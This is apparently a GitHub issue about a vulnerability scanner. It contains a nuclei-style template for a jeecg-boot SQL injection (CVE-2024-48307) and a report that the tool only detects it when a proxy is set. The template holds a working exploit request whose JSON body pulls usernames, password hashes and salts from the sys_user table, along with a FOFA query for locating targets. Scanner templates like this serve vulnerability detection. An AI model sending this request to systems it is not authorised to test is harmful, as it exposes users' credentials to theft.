There is a problem, and I'm not sure what the cause is? #19

@b0q1

```yaml
id: jeecg-boot-onlDragDatasetHeadgetTotalData-sqli

info:
  name: jeecg-boot /drag/onlDragDatasetHead/getTotalData接口SQL注入漏洞
  author: nobody
  severity: high
  reference:
    - none
  metadata:
    fofa-query: body="polyfill_7_2_5.js"
    verified: true
  tags: jeecg-boot,sqli,CVE-2024-48307

http:
  - method: POST
    path:
      - "{{BaseURL}}/jeecg-boot/drag/onlDragDatasetHead/getTotalData"
      - "{{BaseURL}}/jeecgboot/drag/onlDragDatasetHead/getTotalData"
    headers:
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US;q=0.9,en;q=0.8
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
      Connection: close
      Content-Type: application/json
    body: >
      {
        "tableName": "sys_user",
        "compName": "test",
        "condition": {
          "filter": {}
        },
        "config": {
          "assistValue": [],
          "assistType": [],
          "name": [
            {
              "fieldName": "username,password,salt",
              "fieldType": "string"
            },
            {
              "fieldName": "id",
              "fieldType": "string"
            }
          ],
          "value": [
            {
              "fieldName": "id",
              "fieldType": "string"
            }
          ],
          "type": []
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - 'username'
          - 'password'
          - 'salt'
        condition: and
```

It only executes successfully when a proxy is specified; this reproduces consistently.

```
.\shot.exe jeecg-boot-onlDragDatasetHeadgetTotalData-sqli.yaml http://xxxxx
execute finish:
Execution time: 396.9167ms

.\shot.exe -proxy http://127.0.0.1:8080 jeecg-boot-onlDragDatasetHeadgetTotalData-sqli.yaml http://xxxx
Using proxy: http://127.0.0.1:8080
execute finish: &{true false map[] map[] [] map[] map[] map[]}
Execution time: 322.1385ms
```

nuclei can detect it, and it can detect it without a proxy.
